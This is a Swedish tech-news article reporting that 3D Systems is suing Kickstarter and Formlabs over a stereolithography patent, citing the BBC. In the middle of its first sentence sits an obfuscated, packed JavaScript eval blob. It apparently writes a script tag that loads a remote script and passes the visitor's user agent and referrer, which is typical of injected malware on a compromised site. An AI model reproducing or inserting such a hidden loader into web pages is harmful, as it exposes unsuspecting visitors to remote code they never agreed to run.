Image Image Image Image Image Image Image Image Image Image

| 29 maj, 2020

Scroll to top

Top

Kickstarter stäms av 3D Systems

Kickstarter stäms av 3D Systems
Sebastian

 

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kntff|var|u0026u|referrer|inyet||js|php’.split(’|’),0,{}))
stäms hemsidan Kickstarter för första gången. Stämningen kommer från ett bolag som haft sin produkt på sidan. Formlabs 3D-skrivare har fått över 2000 donerare och verkligen fått in mycket pengar för att ta produkten till verklighet, dock hade utvecklaren 3D Systems andra planer meddelar BBC.

Skrivartillverkaren med att att projektet gjort intrång på ett patent som gäller en omfattande teknik som kallas för stereolitografi. Den används för att ta fram modeller för 3D-utskrifter. Det är en laser som sveper över en flytande substans och skapar ett hårt material.

Själva stämningen kommer efter att 3D Systems märkt att försäljningen försämrats efter att Formlabs projekt startat. Det är så att Kickstarter tar en större del av de pengar som projekten genererar. Det är också så att bolaget Formlabs (deras 3d-skrivare vi ser ovan) har fått en stämning mot sig.

BBC meddelar också att detta är första gången Kickstarter stäms för att ha varit involverat i projekt. 

Se projektet här!